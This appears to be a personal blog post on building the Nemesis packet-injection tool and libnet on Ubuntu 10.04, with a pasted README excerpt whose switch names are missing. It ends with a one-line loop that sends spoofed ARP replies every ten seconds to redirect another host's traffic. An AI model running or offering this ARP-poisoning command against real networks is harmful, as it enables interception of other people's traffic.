Installing Nemesis on Ubuntu 10.04


Nemesis is a command-line network packet crafting and injection utility. Ubuntu 10.04 does not provide easy installation of the package through apt-get command. Here are the instructions to successfully install Nemesis on Ubuntu 10.04:


1. Remove any previous libnet (sudo apt-get remove libnet1).
2. Download the source for libnet-1.0.2a (Google it out).
3. Install gcc-4.1 (sudo apt-get install gcc-4.1).
4. Change the CC line in the Makefile of libnet-1.0.2a to be "CC = gcc-4.1" and compile.
5. Download nemesis-1.4 source code (Google it out).

6. Perform "./configure --with-libnet-includes=/usr/include/ --with-libnet-libraries=/usr/lib/ --enable-debug" and compile.







Installing Nemesis on UNIX-like systems is a straightforward process that 
closely resembles installing any other piece of software using GNU autotools. 
Before attempting to install Nemesis, ensure that libnet-1.0.2a is installed.

The following steps are all that is needed to compile and install Nemesisprocedure which i followed)
1. ./configure
2. make
3. make install
4. examine the nemesis man pages
5. enjoy.

When compiling the following switches are available:

Enable debugging options (bugreports and developers only).

If the configuration script can't find the libnet include files on its
own, the path can be set manually with this switch.

If the configuration script can't find the libnet library files on its
own, the path can be set manually with this switch.





while true; do sudo nemesis arp -v -r -d eth0 -S 210.XXX.198.XXX -D 210.XXX.198.XXX -h 00:1a:4d:5d:99:3f -m 44:87:fc:a8:7e:41 -H 00:1a:4d:5d:99:3f -M 44:87:fc:a8:7e:41; echo "Redirecting..."; sleep 10; done
